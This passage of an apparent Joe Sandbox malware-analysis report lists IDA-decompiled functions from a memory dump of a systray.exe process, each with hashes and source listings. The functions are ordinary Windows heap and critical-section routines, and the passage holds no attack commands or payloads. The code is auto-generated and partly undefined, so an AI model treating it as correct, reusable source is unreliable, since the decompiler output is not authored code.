                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c0a0e11a37988fa764d42846f4d2bef578a4acc0054bcb5cb6de70994a11c022
                                            • Instruction ID: 291e70780ab6a82033b18c8f517f2d19d159b28b377fbb8b08f7904ec185221e
                                            • Opcode Fuzzy Hash: c0a0e11a37988fa764d42846f4d2bef578a4acc0054bcb5cb6de70994a11c022
                                            • Instruction Fuzzy Hash: 7EF0E9315396948FDB71DB14D940B17B7D4BB00BB8F084478D50587692C724FC41D641
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E045CA185() {
                                            				void* __ecx;
                                            				intOrPtr* _t5;
                                            
                                            				if( *0x46867e4 >= 0xa) {
                                            					if(_t5 < 0x4686800 || _t5 >= 0x4686900) {
                                            						return L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                            					} else {
                                            						goto L1;
                                            					}
                                            				} else {
                                            					L1:
                                            					return E045B0010(0x46867e0, _t5);
                                            				}
                                            			}






                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bc32a11efe6e91cf63bd06508d8971eaf93b2dce088a2f2d00e14cfb3d8b2e9a
                                            • Instruction ID: 23b017976de936c1d31deb05bd9bc1a74c21dc22fd7e4d88059a88d5d9d48ead
                                            • Opcode Fuzzy Hash: bc32a11efe6e91cf63bd06508d8971eaf93b2dce088a2f2d00e14cfb3d8b2e9a
                                            • Instruction Fuzzy Hash: 82D0C7A11210082EFB2C2B90E814B623712F7C4B18F300A0CF1060A9A0EAA0FCD0A189
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E045C16E0(void* __edx, void* __eflags) {
                                            				void* __ecx;
                                            				void* _t3;
                                            
                                            				_t3 = E045C1710(0x46867e0);
                                            				if(_t3 == 0) {
                                            					_t6 =  *[fs:0x30];
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                            						goto L1;
                                            					} else {
                                            						return L045B4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                            					}
                                            				} else {
                                            					L1:
                                            					return _t3;
                                            				}
                                            			}






                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79f618d9fb04a67212c477e9b1d388e477f363c882b9dac2a042f3ad8ec76b75
                                            • Instruction ID: dbddbb36979abac28b836bc10e376c9e6e34539f494cf7573049a45929aafc5d
                                            • Opcode Fuzzy Hash: 79f618d9fb04a67212c477e9b1d388e477f363c882b9dac2a042f3ad8ec76b75
                                            • Instruction Fuzzy Hash: 51D0A7311405015AFA2D5F50A804B143251FBC0BC9F38005CF10B598C2CFB0FCD2F888
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E045C35A1(void* __eax, void* __ebx, void* __ecx) {
                                            				void* _t6;
                                            				void* _t10;
                                            				void* _t11;
                                            
                                            				_t10 = __ecx;
                                            				_t6 = __eax;
                                            				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                            					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                            				}
                                            				if( *((char*)(_t11 - 0x1a)) != 0) {
                                            					return E045AEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            				}
                                            				return _t6;
                                            			}







                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                            • Instruction ID: 51f57b4bc53f0a90c5cee31fcffde7a6a7c5f071d95bb3a7cf14234a523a13a7
                                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                            • Instruction Fuzzy Hash: A9D0A93154218D9EEB01AB90D22876C33B2BB4230CF58A06D880206852C3BA6A1EF600
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0459AD30(intOrPtr _a4) {
                                            
                                            				return L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                            			}



                                            0x0459ad49

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                            • Instruction ID: fdba327e713c4675c2c84112dc09e11091e1994028e32e9401ccb044f6340aca
                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                            • Instruction Fuzzy Hash: 7DC08C32080688BBC7126A45CD00F017B29E7D4B60F000020BA040A6618932E861E588
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E045C36CC(void* __ecx) {
                                            
                                            				if(__ecx > 0x7fffffff) {
                                            					return 0;
                                            				} else {
                                            					return L045B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                            				}
                                            			}




                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                            • Instruction ID: d893f14511d1dca4490e5380dcb4e5748fb4609aec4b5429a34c5aba31efc864
                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                            • Instruction Fuzzy Hash: FBC02B70150440FFE7251F70CD00F147254F740A21F6403587220494F0D528BC00F500
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E045B7D50() {
                                            				intOrPtr* _t3;
                                            
                                            				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                            				if(_t3 != 0) {
                                            					return  *_t3;
                                            				} else {
                                            					return _t3;
                                            				}
                                            			}





                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                            • Instruction ID: a6cd9916122fdc79a149ba05edcc09eb8b0df0bdf6b12e2080e6fd0f3f7b4021
                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                            • Instruction Fuzzy Hash: 72B092343019409FCF16DF18C080B5533E4BB88A80B8400D4E400CBA20D229E8009900
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 53%
                                            			E0462FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                            				void* _t7;
                                            				intOrPtr _t9;
                                            				intOrPtr _t10;
                                            				intOrPtr* _t12;
                                            				intOrPtr* _t13;
                                            				intOrPtr _t14;
                                            				intOrPtr* _t15;
                                            
                                            				_t13 = __edx;
                                            				_push(_a4);
                                            				_t14 =  *[fs:0x18];
                                            				_t15 = _t12;
                                            				_t7 = E045DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                            				_push(_t13);
                                            				E04625720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                            				_t9 =  *_t15;
                                            				if(_t9 == 0xffffffff) {
                                            					_t10 = 0;
                                            				} else {
                                            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                            				}
                                            				_push(_t10);
                                            				_push(_t15);
                                            				_push( *((intOrPtr*)(_t15 + 0xc)));
                                            				_push( *((intOrPtr*)(_t14 + 0x24)));
                                            				return E04625720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                            			}











                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0462FDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0462FE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0462FE2B
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: 4884d1ed745216e2e9b2ef599821b87917c07c058c4b27654b994aa0e6b574be
                                            • Instruction ID: 3b38bee6a96998ed215f7f01a1ee3acf39db0ee8ffba59c54c3ce72b5a8ee6ca
                                            • Opcode Fuzzy Hash: 4884d1ed745216e2e9b2ef599821b87917c07c058c4b27654b994aa0e6b574be
                                            • Instruction Fuzzy Hash: 81F0F672240611BFE6352A45DD02F33BF6AEB84730F140318F668565D1EA62FC60EAF4
                                            Uniqueness

                                            Uniqueness Score: -1.00%